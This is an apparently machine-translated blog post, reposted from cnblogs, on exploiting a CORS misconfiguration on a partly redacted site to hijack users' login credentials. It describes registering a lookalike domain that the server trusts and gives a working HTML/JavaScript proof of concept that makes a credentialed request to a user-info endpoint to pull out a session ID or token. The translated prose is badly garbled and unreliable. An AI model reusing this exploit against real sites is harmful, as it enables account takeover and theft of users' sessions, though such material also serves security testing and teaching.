CORSは、ユーザーのログイン資格情報をハイジャック

RCOIL:の脆弱性

プロセスを掘り進むことは誤ってパケットを見て、応答パケットは、このフィールドにアクセス制御 - 許可 - 起源含まれ、その後、CORSの抜け穴が容易にあるかどうかを確認してみてください!結果が示されています

次に、以下の図を見つけよう!

私は戻ってプラスドメイン名がリソースへのクロスドメインアクセスすることができました

どのように使用するには?

パンが解決される使用は、http:比較的貧しい缶余裕がないドメイン名に対する当社のIPへの//m.****.com.rcoil.me決意は、彼らが次のように、パン・分析までローカルDNSセットを取りますマップ

限り.rcoil.meが地元にこれを解決します*として

POCは次の通り:

<!DOCTYPE html>
<html>
<body>
<center>
<h2>CORS POC Exploit</h2>
<h3>Extract SID</h3>
 
<div id="demo">
<button type="button" onclick="cors()">Exploit</button>
</div>
 
<script>
function cors() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      document.getElementById("demo").innerHTML = alert(this.responseText);
    }
  };
  xhttp.open("GET", "http://m.***.com/activity/juejiapi/editor/userinfo", true);
  xhttp.withCredentials = true;
  xhttp.send();
}
</script>
 
</body>
</html>

TOKENは、前述したように、それをやって入手することができます

概要:
最初のステップ、CORSを制御可能にすることが可能かどうかを確認
するステップ2を制御すれば、その後の唯一のアカウントのログイン資格情報を探して、
その後、ハイジャックの資格情報かどうかを観察し、ステップ3

おすすめ

転載: www.cnblogs.com/zpchcbd/p/11891863.html